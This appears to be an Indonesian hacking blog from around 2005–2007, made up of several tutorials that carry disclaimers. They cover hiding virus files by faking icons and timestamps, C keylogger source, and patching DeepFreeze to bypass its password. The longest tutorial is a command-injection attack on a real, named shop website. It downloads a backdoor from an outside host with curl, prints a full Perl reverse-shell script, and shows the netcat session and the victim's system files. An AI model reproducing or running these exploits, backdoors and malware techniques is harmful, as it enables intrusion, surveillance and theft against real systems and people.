' Jump to and hack the RESOURCE_DATA_ENTRY
Cursor = L3Entries(iLvl3).Offset + ResTree
SetFilePointer hfile, Cursor, 0, 0
WriteFile hfile, DIBOffset, 4, BytesRead, ByVal 0&
WriteFile hfile, CLng(DIBAttrib.dwBytesInRes + 40), 4, BytesRead, ByVal 0&
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
HackDirectories = False
Exit Function
End If

HackDirectories = True
Exit Function

ErrHandler:

End Function
Private Function RVA_to_Offset(RVA As Long) As Long
On Error GoTo ErrHandler:
Dim TempOffset As Long ' Difference of RVA and start of section
TempOffset = RVA - ResSectionRVA
If (TempOffset >= 0) Then
' Calculate the file offset of the RVA
RVA_to_Offset = ResSectionOffset + TempOffset
Else
RVA_to_Offset = -1
End If
Exit Function

ErrHandler:

End Function

Private Function Offset_to_RVA(Offset As Long) As Long
On Error GoTo ErrHandler:

Dim TempOffset As Long ' Difference of Offset and start of section

' Get distance between offset and start of resource section
TempOffset = Offset - ResSectionOffset
If TempOffset >= 0 Then
' Calculate RVA of the file offset
Offset_to_RVA = ResSectionRVA + TempOffset
Else
Offset_to_RVA = -1
End If
Exit Function

ErrHandler:

End Function
------------------------------------Cut Here & End Copy-Paste from Here------------------------------------

Prosedur ReplaceIcon (1st. Module) akan mengganti Ikon Virus kita dengan file *.Ico tsb (Source = Path file ikon,
Dest = Path file yang akan diganti ikonnya), Ada beberapa kelemahan dalam penggantian Ikon ini. Pertama, bila Virus
dikompress atau di-Pack dengan settingan untuk menghilangkan atau hanya megkompress resource dari File maka
penggantian Ikon ini tidak bisa berjalan mulus. Kedua, untuk beberapa file yang akan dikestrak kadang-kadang ikon
tidak berukuran 16X16, bahkan tidak bisa diekstrak sama sekali.

2. Penggantian Date dan Time File Virus
Field apakah yang paling sering digunakan dalam fasilitas Search suatu file di Windows? Waktu akses/modif/buat dari file.
Ambil contoh virus A.exe dibuat pada tanggal 1 Feb 2006, mulai menginfeksi komputer anda tanggal 2 Feb 2006. Maka yang harus
anda lakukan dalam mencari file tsb dengan mengisikan field tanggal search dengan range 1 Feb 2006 sampai 2 Feb 2006.
Apa yang harus dilakukan? Kita harus rubah tanggal akes/modif/buat dari file Virus kita agar tidak (atau setidaknya mempersulit)
User mencarinya. Berikut Source Code yang kira-kira dapat menggambarkan teknik tersebut :

(Referensi Source Code dari Internet, Author : marskarthik@angelfire.com)

------------------------------------Cut Here & Start Copy-Paste from Here------------------------------------
Option Explicit

Public Declare Function SetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long
Public Declare Function GetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long
Public Declare Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long
Public Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long
Public Declare Function SystemTimeToFileTime Lib "kernel32" (lpSystemTime As SYSTEMTIME, lpFileTime As FILETIME) As Long
Public Declare Function LocalFileTimeToFileTime Lib "kernel32" (lpLocalFileTime As FILETIME, lpFileTime As FILETIME) As Long
Public Declare Function OpenFile Lib "kernel32" (ByVal lpFileName As String, lpReOpenBuff As OFSTRUCT, ByVal wStyle As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Public Const OF_READ = &H0
Public Const OF_READWRITE = &H2
Public Const OF_REOPEN = &H8000
Public Const OF_SHARE_COMPAT = &H0
Public Const OF_SHARE_DENY_NONE = &H40
Public Const OF_SHARE_DENY_READ = &H30
Public Const OF_SHARE_DENY_WRITE = &H20
Public Const OF_SHARE_EXCLUSIVE = &H10
Public Const OF_VERIFY = &H400
Public Const OF_WRITE = &H1
Public Const OFS_MAXPATHNAME = 128

Public Type OFSTRUCT
cBytes As Byte
fFixedDisk As Byte
nErrCode As Integer
Reserved1 As Integer
Reserved2 As Integer
szPathName(OFS_MAXPATHNAME) As Byte
End Type

Public Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type

Public Type SYSTEMTIME
wYear As Integer
wMonth As Integer
wDayOfWeek As Integer
wDay As Integer
wHour As Integer
wMinute As Integer
wSecond As Integer
wMilliseconds As Integer
End Type

Public Sub ubahtanggal(pathfil As String, hari As Long, bulan As Long, tahun As Long, Optional creat As Boolean, Optional modif As Boolean, Optional acces As Boolean)
On Error Resume Next
Dim hfile As Long, rval As Long
Dim buff As OFSTRUCT
Dim ctime As FILETIME, latime As FILETIME, mtime As FILETIME
Dim stime As SYSTEMTIME
Dim fil As String

If IsMissing(creat) Then creat = False
If IsMissing(modif) Then modif = False
If IsMissing(acces) Then acces = False

hfile = OpenFile(pathfil, buff, OF_WRITE)
If hfile Then
rval = GetFileTime(hfile, ctime, latime, mtime)
If creat Then
rval = FileTimeToLocalFileTime(ctime, ctime)
rval = FileTimeToSystemTime(ctime, stime)

stime.wYear = tahun
stime.wMonth = bulan
stime.wDay = hari
stime.wHour = Hour(Time)
stime.wMinute = Minute(Time)
stime.wSecond = Second(Time)

rval = SystemTimeToFileTime(stime, ctime)
rval = LocalFileTimeToFileTime(ctime, ctime)
End If
If modif Then
rval = FileTimeToLocalFileTime(mtime, mtime)
rval = FileTimeToSystemTime(mtime, stime)

stime.wYear = tahun
stime.wMonth = bulan
stime.wDay = hari
stime.wHour = Hour(Time)
stime.wMinute = Minute(Time)
stime.wSecond = Second(Time)

rval = SystemTimeToFileTime(stime, mtime)
rval = LocalFileTimeToFileTime(mtime, mtime)
End If
If acces Then
rval = FileTimeToLocalFileTime(latime, latime)
rval = FileTimeToSystemTime(latime, stime)

stime.wYear = tahun
stime.wMonth = bulan
stime.wDay = hari
stime.wHour = Hour(Time)
stime.wMinute = Minute(Time)
stime.wSecond = Second(Time)

rval = SystemTimeToFileTime(stime, latime)
rval = LocalFileTimeToFileTime(latime, latime)
End If
rval = SetFileTime(hfile, ctime, latime, mtime)
End If
rval = CloseHandle(hfile)
End Sub
------------------------------------Cut Here & End Copy-Paste from Here------------------------------------

Prosedur ubahtanggal akan merubah date dari file virus, dengan parameter hari, bulan dan tahun sesuai dengan
yang kita inginkan. Parameter creat, modif dan acces menunjukkan date atau time mana yang akan diubah, Sebagai contoh
bila acces bernilai True dan lainnya bernilai False maka hanya date dan time Acces saja yang akan diubah.

$> End...
Karena keterbatasan tempat dan waktu maka saya hanya bisa membeberkan 2 teknik saja yang saya kira dapat digunakan
untuk mempersulit User dalam mencari File Induk dari Virus. Saya ingin memohon maaf apabila ada kekurangan atau
pernyataan yang menyinggung pembaca.

$ Greetz...
>Myztx @ Myztx Soft. House, Hellspawn, Brontok Creator, Tomero, MyHeart Creator, Kantuk Creator, n The other Vx3rs.
>All member of Mail-list : EcHo, Jasakom, Yogyafree, ITCenter, Virologi, Balihack, Informatics_01, ProgrammerVB n the others.
>Spyro, Vaganci, Yanto, n All my Friends at IA01 [2005], IA07 [2004] @ GunaDarma University, Depok.
>marskarthik@angelfire.com, (Naveed) neenojee@hotmail.com.
>Sites : VbBego.com, Virologi.info, Vaksin.com, Planet-Source-Code.com n the others.

Fungsi windows API

2007-06-28T22:56:00.001+07:00

- 26-9-06 -
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn", tidak
kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.

Intro
$>API atau Application Programming Interface merupakan fungsi-fungsi Eksternal
yang terdapat dalam file-file perpustakaan Windows (Library Windows) atau file
library lainnya yang dapat dimanfaatkan oleh aplikasi. File Lib (Library) ini
terdapat di Folder system Windows (C:\Windows\System32). Penggunaannya dalam
sebuah aplikasi haruslah dideklarasikan terlebih dahulu di Source Code aplikasi.

Tujuan Penggunaan
$>Kadang kita berpikir "Gimana sih aplikasi kita biar bisa nyatet ketikan keyboard?"
atau "Gimana sih aplikasi kita bisa nyari folder system windust(Baca:Windows) secara
otomatis tanpa kita kasi tahu pathnya terlebih dahulu?", jawabannya adalah dengan
menggunakan fungsi-fungsi API yang ada. Dibuat dari bahasa apakah Fungsi API itu?
Pada permulaannya API ditulis dengan bhs C/C++ lalu pemanfaatannya sangatlah luas oleh
bhs program lain (VB, DELPHI, Dll) yang tentunya memerlukan suatu konversi terhadap
pendeklarasiannya.

Tools atau Softwarez dan Skill yang diperlukan
$>Setidaknya anda telah belajar menggunakan ataupun membuat suatu aplikasi dengan
VB (Visual Basic) atau DELPHI ataupun C/C++.
$>Softwarez : M$ Visual Basic 5.0/6.0 atau DELPHI
M$ Visual C++ 6.0 atau compiler C/C++ yang lain
$>Tools : API Text Viewer

Tutorial
$>Sebagai contoh akan saya berikan suatu Aplikasi Keylogger (Aplikasi yang mencatat
Ketikan keyboard lalu menyimpannya ke File .log) dengan bhs C. Fungsi API yang akan
digunakan adalah :

- GetSystemDirectory(LPSTR lpBuffer,Uint uSize)
Adalah Fungsi API yang akan mencari Folder/Direktori System Windust
Dimana LPSTR lpBuffer adalah variabel dengan tipe data char[256] dan
Uint uSize adalah variabel dengan tipe data Integer dengan nilai
sizeof(lpBuffer). Nilai balik fungsi ini akan memberikan nilai sesuai dengan
panjang Direktori system tsb. Contoh :
int i;char j[256];
i = GetSystemDirectory(j,sizeof(j));
misal j bermuatan = "F:\Windows\System32"
maka i == sizeof(j) == 19

- GetAsyncKeyState(Uint var)
Adalah fungsi yang akan mengembalikan nilai -32767 bila var bernilai kode ascii
yang benar/valid. Contoh :
if(GetAsyncKeyState(i)==-32767)
printf("OK");
maka bila kita ketik apa saja di keyboard maka akan mencetak "OK" di layar.

- GetKeyState(Uint var)
Adalah fungsi yang hampir sama dgn GetAsyncKeyState hanya saja akan mengembalikan
nilai 1 bila var bernilai benar/valid. Fungsi ini akan mengecek kondisi dari abjad
yang diketikkan apakah huruf KAPITAL (VK_CAPITAL) yakni tombol CAPSLOCK ditekan atau tidak.
Contoh :
if(GetKeyState(VK_CAPITAL))
printf("KAPITAL");
maka bila kita menekan tombol CAPSLOCK maka akan mencetak "KAPITAL" di layar.

$>Lalu bagaimana kita menggunakan fungsi-fungsi API diatas? Dalam bhs C/C++ kita dapat langsung
menggunakannya tanpa perlu dideklarasikan terlbih dahulu. Sedangkan untuk Visual Basic atau DELPHI
harus dideklarasikan di bagian General. Contoh (Dalam Visual BAsic 6.0) :

(General)
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Sebagaimana kita dapat lihat fungsi API GetAsyncKeyState tersebut menggunakan library "user32" dan
nilai baliknya adalah tipr data Integer.

$>Sedangkan implementasinya pada program keylogger kita adalah sebagai berikut :

$>Penggunaan GetAsyncKeyState() :
----------------potong di sini-------------------

while(1) //Perulangan tak hingga (Infinite Loop)
{
for(j=8;j<=255;j++) //perulangan sesuai dengan ASCII (dimulai dari ASCII 8)
{
if (GetAsyncKeyState(j)==-32767) //Fungsi API, nilai balik = -32767 bila ASCII valid
{
if (j==8) //dimana j adalah var int
catat("[del]"); //masukkan ke fungsi catat()
if (j==13)
catat("[enter]");
if (j==32)
catat("[space]");
if(j==VK_CAPITAL)
catat("[CapitalLetters]");
if (j==VK_TAB)
catat("[TAB]");
if (j ==VK_SHIFT)
catat("[SHIFT]");
if (j ==VK_CONTROL)
catat("[CTRL]");
if (j ==VK_PAUSE)
catat("[PAUSE]");
if (j ==VK_KANA)
catat("[Kana]");
if (j ==VK_ESCAPE)
catat("[ESC]");
if (j ==VK_END)
catat("[END]");
if (j ==VK_HOME)
catat("[HOME]");
if (j ==VK_LEFT)
catat("[LEFT]");
if (j ==VK_UP)
catat("[UP]");
if (j ==VK_RIGHT)
catat("[RIGHT]");
if (j ==VK_DOWN)
catat("[DOWN]");
if (j ==VK_SNAPSHOT)
catat("[PRINT]");
if (j ==VK_NUMLOCK)
catat("[NUM LOCK]");
if (j ==190 || j==110)
catat(".");
if (j >=96 && j <= 105) //periksa apakah yg ditekan adalah numerik key
{
j = j - 48;
teks[x]=j; //teks adalah char teks[5000]
x++; //var x digunakan untuk pengaturan string dalam array teks
}
if (j >=48 && j <= 59) //periksa apakah yg ditekan adalah numerik key di numpad
{
teks[x]=j;
x++;
}
if (j !=VK_LBUTTON || j !=VK_RBUTTON)
{
if (j >=65 && j <=90) //
{
if (GetKeyState(VK_CAPITAL)) //fungsi API GetKeyState()
catat(&j);
else
{
j = j +32; //mencatat alfabet kecil (non-kapital)
teks[x]=j;
x++;
}
}
}

}
}

}

int catat(char *tamp2) //fungsi untuk memasukkan string ke dalam array teks
{
sprintf(tamp,"%s",tamp2);
strcat(teks,tamp);
x=x+strlen(tamp);
}

----------------potong di sini-------------------

$>Penggunaan GetSystemDirectory() :
----------------potong di sini-------------------

m=GetSystemDirectory(s,255); //m adalah var integer yang akan berisi panjang dari path folder System Windust
if(m!=0) //Cek apakah m tidak sama dengan 0
strcat(dir,s); //memasukkan path dari folder system ke var char dir[256]
y=CopyFile(argv[0],(strcat(dir,"coba.exe")),TRUE) //copy file kita ke folder windust, jika berhasil y akan bernilai TRUE

----------------potong di sini-------------------

$>Potongan Source Code diatas belumlah optimal, dikarenakan masih menggunakan statement-statement yang
sama berulang kali. Lalu bagaimana dengan fungsi API yang lain? MAsih banyak fungsi-fungsi API yang lain seperti keybd_event,
SetActiveWindow, LoadAccelerators dan lain-lain. Tetapi karena keterbatasan waktu dan tempat saya tidak bisa menjabarkan
satu persatu, mungkin pada kesempatan yang lain.

Thanks,

Referensi : Pemograman WINDOWS API dengan MS Visual Basic oleh Rahadian Hadi
WWW.Planet-source-code.com
www.google.co.id

UN-Freeze DeepFreeze di Win2K/Xp

2007-06-28T22:55:00.001+07:00

- 24-10-05 -

Pengantar:
Penulis tidak bertanggung jawab akan kerusakan atau kerugian yang ditimbulkan akibat penggunaan ataupun
pelaksanaan tutorial ini. Tutorial ditujukan untuk mereka yang mau belajar bukan untuk mereka yang ingin
merusak bahkan merugikan orang lain dengan tindakannya.Anyway, Let's Get It on!!!!

$>DeepFreeze adalah salah satu Software yang digunakan untuk mengamankan, mencegah dan mengontrol komputer
dari pengerusakan yang dilakukan sengaja ataupun tidak sengaja.
Sesuai dengan namanya software ini akan "Membekukan" segala yang ada di partisi "beku"nya.
Tidak ada "Restriction" dalam penggunaan komputer yang "dibekukan", hanya saja semua settingan, dan kondisi
komputer akan kembali seperti semula setelah komputer di-restart / booting.
$>Tutorial ini akan membahas tentang cara Disable/Un-freeze DeepFreeze versi 4.20.020.0598, 4.20.120.0598,
4.20.121.0613, 5.20.220.1125 dan 5.30.120.1181 pada OS Windows 2K/XP.

$>Pada umumnya DeepFreeze mempunyai aplikasi yang aktif di komputer yang masih "Enable", dan bila kita ingin
mengubah setingan dari DeepFreeze maka harus masuk ke menu Config yang diproteksi oleh password tentunya.
$>Ada beberapa cara untuk men-Disable software ini, yaitu dengan menggunakan disket (bootable tentunya)
lalu boot dari disket itu dan memindahkan file DFSERVEX.EXE yang berada di path c:\progra~1\hypert~1\deepfr~1
ke tempat lain. Dan yang terakhir yaitu dengan menggunakan Disassembler untuk mem-Patch File Frzstate(2K).exe.
Tutorial ini akan membahas cara yang kedua.

Tools yang diperlukan :
1.Ollydbg 1.10 > http://www.ollydbg.de/
2.Process Explorer > http://www.sysinternals.com/
3.Ollyscript > http://ollyscript.apsvans.com/
4.ASPack 2.12 OEP finder script by hacnho/VCT2k4 > http://ollyscript.apsvans.com/

Langkah-langkah :
1.Jalankan Process Explorer lalu lihat aplikasi Frzstate.exe atau Frzstate2k.exe yang berjalan lalu klik kanan
untuk melihat propertiesnya. Catat Properties Command Linenya yang berisi path program itu dan 3 angka terakhir.
contoh : C:\Program Files\HyperTechnologies\Deep Freeze\_$Df\FrzState.exe 1 1066917 0 << 3 angka terakhir
2.Jalankan Ollydbg 1.10 dan buka Aplikasi Frzstate(2k).exe melalui path yang sudah dicatat. Jangan lupa masukkan
3 angka terakhir di kolom Arguments.
3.Akan ada box peringatan yang muncul hiraukan saja, pada box peringatan kedua kilk No.
4.Jalankan Plug-in OllyScript dengan memb-Browse-nya di menu Options>Appearance>Plugi-in Path
5.Jalankan Script EOP di menu Plugins>Run Script>Ollyscript tentukan path dari EOP script lalu klik Open.
6.Setelah itu script akan membuka code asli. Perhatikan apakah ada ikon dfreeze di system tray (DFreeze dapat diset-
untuk tidak menampilkannya),bila tidak ada klik kanan pada jendela code pilih Go to>Expression dan masukkan nilai
berikut :
versi 4.20.020.0598 > 40A2BE
versi 4.20.120.0598 > idem
versi 4.20.121.0613 > 409F4A
versi 5.20.220.1125 > 40FC4A
versi 5.30.120.1181 > idem
dan klik Ok. Setelah itu program akan menuju ke baris tersebut. Klik kanan lagi pilih Assemble lalu isi kolom dengan
ekspresi NOP dan jangan lupa checklist pilihan Fill with NOP's lalu klik Assemble.
7.Kembali lagi ke jendela code, klik kanan untuk memilih Go to dan isi dengan nilai berikut :
versi 4.20.020.0598 > 40368D
versi 4.20.120.0598 > idem
versi 4.20.121.0613 > 4034F5
versi 5.20.220.1125 > 4037E9
versi 5.30.120.1181 > 4037E9
lalu kilk Ok. Program akan menuju baris tersebut. Kita akan membuat sebuah BreakPoint disini.
8.Klik kanan pilih Breakpoint>Toogle, lalu tekan F9 untuk eksekusi baris tersebut. Bila benar akan muncul 2 ikon
Deepfreeze pada system tray. Pilihlah salah satu ikon tersebut dan tekan Shift+dobel klik atau ctrl+Shift+Alt+F6
untuk membuka Form Login DFreeze. Isi kolom password dengan apa saja allu klik OK atau Enter.
9.Jika ikon yang kita pilih benar maka form Login tersebut seolah-olah "Membeku". Kembali ke jendela code di Ollydbg
tekan F8 dan lihat jendela register di sebelah kanan, ganti isi register EAX dengan nilai 1 (dalam hexadesimal) dengan
dobel klik di register tersebut. (nilai 000000000 merupakan value "False" untuk pengecekan password)
10.Tekan F9 untuk eksekusi program lagi, bila benar maka kita akan mendapatkan sebuah form Config dari DeepFreeze.

referensi :
1.http://usuarios.arnet.com.ar/fliamarconato/
2.http://webs.uolsinectis.com.ar/c_delgado/

Connect Back melalui Bug CGI

2007-06-28T22:47:00.000+07:00

- 6-11-05 -
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn", tidak
kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.

Intro
$>Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk melaksanakan command-command
untuk meng-eksploitasi sistem. Tetapi hal ini juga dipengaruhi oleh settingan dari sistem
tersebut apakah mengijinkan kita untuk membuat/menulis File di Server tersebut.

Tujuan
$>Membuat suatu backdoor dengan cara connect back melalui CGI Bug

Tools atau Softwarez dan Skill yang diperlukan
$>Setidaknya mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat, locate ,dll)
$>Softwarez : Browser HTML (Opera, FireFox, IE, dll)
$>Tools : NetCat dan file backdoor (.txt atau .prl)

Tutorial
$>Langkah pertama yang harus dilakukan adalah mencari site yang menggunakan CGI dengan bug :
"shop.pl?seite" atau "family_showpage.cgi". Bagaimana mencarinya? yaitu googling dan memasukkan
keyword allinurl dengan tambahan bug diatas. Contoh, allinurl : "shop.pl?seite". Maka kita akan
dapat berbagai macam halaman yang dapat di-tes bugnya. Pilih salah satu dan kita akan memulai mencoba
connect back.
$>Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara char "||", maka perintah kita
akan terlihat seperti ini : |perintah|, selain dengan char pipe(|) bisa juga menggunakan char ";".
Contoh (dengan bug shop.pl?seite) :

>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|perintah|&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892

Maka pada browser kita akan terlihat isi dari direktori server tersebut.
Contoh :
finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl

Weikkss....Banyak filenya tuh :P

$>Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat file disana dengan perintah "id"

>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|id|&KNR=3055892

Kalo benar maka akan tampak :

uid=290076(ade001) gid=103(web) groups=103(web)

Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D

$>Selanjutnya kita upload File Backdoor yang kita ambil dari site lain,

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|curl -o back.txt http://www.goodwillco.com/tes.txt|&KNR=3055892

Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu tes.txt, kalo sudah tidak ada silahkan
copy-paste teks berikut kedalam Notepad dan simpan dengan Ekstensi *.txt, Coding by 1St :D

#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl
# --------
# The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website.
# ---------

use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n";
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR)

Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan nama back.txt
Kalo curl -o tidak bisa gunakan wget -o.

$> Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah ter-upload...

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892

back.txt finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl

Tampaknya file backdoor kita sudah ada tuh :D

$> Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya >

C:\>netcat.exe -lLvvp 9000

catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi komputer masing2 :D

Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut

$> Kita akan melakukan connectback dari server korban dengan meng-compile file backdorr tsb :

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|PERL back.txt 61.xxx.xxx.xxx 9000|&KNR=3055892

catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port tujuan yang sudah terbuka
jika komputer kita memakai proxy atau firewall harap di konfigurasi ulang agar server korban bisa melakukan
connectback terhadap kita :D

Bila benar maka :

C:\>netcat -lLvvp 9000
listening on [any] 9000 ...
connect to [61.xxx.xxx.xxx] from www.a66.de [213.198.17.90] 14542
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)

Linux a66.de 2.4.2 FreeBSD 4.7-RELEASE-p22 #5: Tue May 3 13:36:49 MDT 2005
roo i386 unknown
uid=290076(ade001) gid=103(web) groups=103(web)
ls
back.txt
finnishorder.pl
formmailmalaysia.pl
honeymoon.cfg
honeymoon.pl
honeymoonfinnishorder.pl
honeymoonorder.pl
ikonboard
order.pl
preise.pl
remview.php
shop.cfg
shop.pl
su
su: you are not in the correct group (sys) to su root.

weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super user tuh :(
Mungkin kita bisa liat groupnya :

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&KNR=3055892

DIR_COLORS X11 bashrc csh.cshrc csh.login filesystems group host.conf hosts.allow hosts.deny info-dir inputrc
ld.so.cache ld.so.conf ldap_auth master.passwd mhpop_redirect mtab nsswitch.conf opt pam.d passwd profile profile.d
redhat-release rpc rpm securetty shells skel ssd.attrib syb_dbs termcap xinetd.d yp.conf

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|cat /etc/group|&KNR=3055892

sys::0:root,bin,sys,adm,devel,smoc1,daemon,vbackups,sap,sentinel root::0:root daemon::1:root,daemon bin::2:root,bin,daemon
adm::3:root,adm,daemon mail::4:root uucp::5:uucp rje::8: lp:*:9: nuucp::10:nuucp user::20: ftp::201:
other::995: guest:*:998: postgres:*:70: news:*:86: mysql:*:88: sql:*:89: staff::100:devel,smoc1 sybase::101:sybase,devel,webapps,sap,jkoecher,anonweb
client:*:102:devel,root,webapps,urchind web:*:103:root,webapps nofiles:*:104: qmail:*:105: devel:*:106:sybase,hu,webapps,sap,ftp,jkoecher,anonweb mailed:*:107:barryg
apps:*:108:hu,idsuser networks:*:109: squid:*:203: solutions:*:1025: test:*:204: dnsadmin:x:501:named tsedit:*:110:lvance,chuckr,eduda,ggarza,steve,mbalme mailedit:*:111:mminnig
nogroup:*:65533: webapps:*:149: sap:*:191: nobody:*:60001: smmsp:*:25:smmsp

Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana ngerubahnya ???
sayangnya tutorial ini hanya membahas caraa kita untuk melakukan connectback dengan menggunakan CGI BUG
Untuk lebih jelasnya silakan cari artikel ttg hal tsb di Google :D
Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya mungkin !!!???? :D
(ingat site ini adalah semacam online-shop :D), silakan masukkan perintah locate order.log atau
locate .log di browser anda :D hehehehehehhe

Special Thanks go to : Myztx @ Myztx Soft House, Om choi @ #e-c-h-o atas tutor dan kesabarannya dalam mengajari junior mu ini :D
, admin www.a66.de hehehehe jangan marah ya mas/mbak :P webnya dijadikan percobaan :D
n ndak lupa juga to Spyro (the dragon??? :P) atas tempat buat artikel ini di webnya yg makin ciamik :D

Tutorial UnFreeze DeepFreeze Versi 3 di Win 9x (Saduran)

2007-06-28T22:45:00.000+07:00

- 24-10-05 -

Pengantar:
Penulis tidak bertanggung jawab akan kerusakan atau kerugian yang ditimbulkan akibat penggunaan ataupun
pelaksanaan tutorial ini. Tutorial ditujukan untuk mereka yang mau belajar bukan untuk mereka yang ingin
merusak bahkan merugikan orang lain dengan tindakannya.Anyway, Let's Get It on!!!!

$>DeepFreeze adalah salah satu Software yang digunakan untuk mengamankan, mencegah dan mengontrol komputer
dari pengerusakan yang dilakukan sengaja ataupun tidak sengaja.
Sesuai dengan namanya software ini akan "Membekukan" segala yang ada di partisi "beku"nya.
Tidak ada "Restriction" dalam penggunaan komputer yang "dibekukan", hanya saja semua settingan, dan kondisi
komputer akan kembali seperti semula setelah komputer di-restart / booting Bahkan dari FORMAT sekalipun!!!!.
$>Tutorial ini akan membahas tentang cara Disable/Un-freeze DeepFreeze versi 3.32.000.0534 pada OS Windows 9x. Secara sederhana
kita hanya akan mendapatkan akses ke menu config DeepFreeze dengan password Invalid.

Tools yang diperlukan :
1.Ollydbg 1.10 > http://www.ollydbg.de/ >> debugger kita
2.Process Explorer > http://www.sysinternals.com/ >> Process viewer
3.DesAspack 2.11 > http://protools.cjb.net/ >> Unpacker buat Aspack 2.11

Langkah-langkah :
1. Jalankan Process Explorer lalu cari process Program Frzstate.exe (Program ini yang menyimpan status Deepfreeze Freeze/Thawed),
lihat bagian Propertiesnya dengan meng-klik kanan dan catat atau hapalkan Path dimana program itu berada.
2. Selanjutnya kita akan mematikan process Frzstate.exe tsb...TUnggu dulu kita tidak bisa langsung mematikannya begitu saja,
karena bila kita langsung kill process program tsb maka dia akan muncul kembali..!!! mengapa demikian?? ternyata DeepFreeze
mempunyai program yang mengecek keberadaan process dari Frzstate.exe tsb... Cari nama process program MSGSRV32.exe pada
process explorer kita dan matikan processnya lalu baru kita matikan process Frzstate.exenya...
3. jalankan DesAspack 2.11 untuk unpack program Frzstate.exe (ingat Path porgram ini!) dengan memilih file yang akan di-unpack.
4. Setelah proses unpack sukses maka akan ada file baru bernama out.exe di direktori yang sama dengan Frzstate.exe, file ini bernama out.exe
....File ini yang selanjutnya akan kita bypass....Jalankan Ollydbg1.10 dan buka file out.exe tsb.
5. Setelah out.exe teranalisa, maka klik kanan untuk memilih option Goto (kita akan meloncat ke line number tertentu) dan isikan dengan 417410
lalu OK.
6. Maka pointer atau highlight akan berada di baris tersebut (417410), baris inilah yang akan mengecek apakah Password kita Valid atau tidak,
kita harus membuat suatu Stopper disini dnegan klik kanan lalu pilih BreakPoint > Toogle.
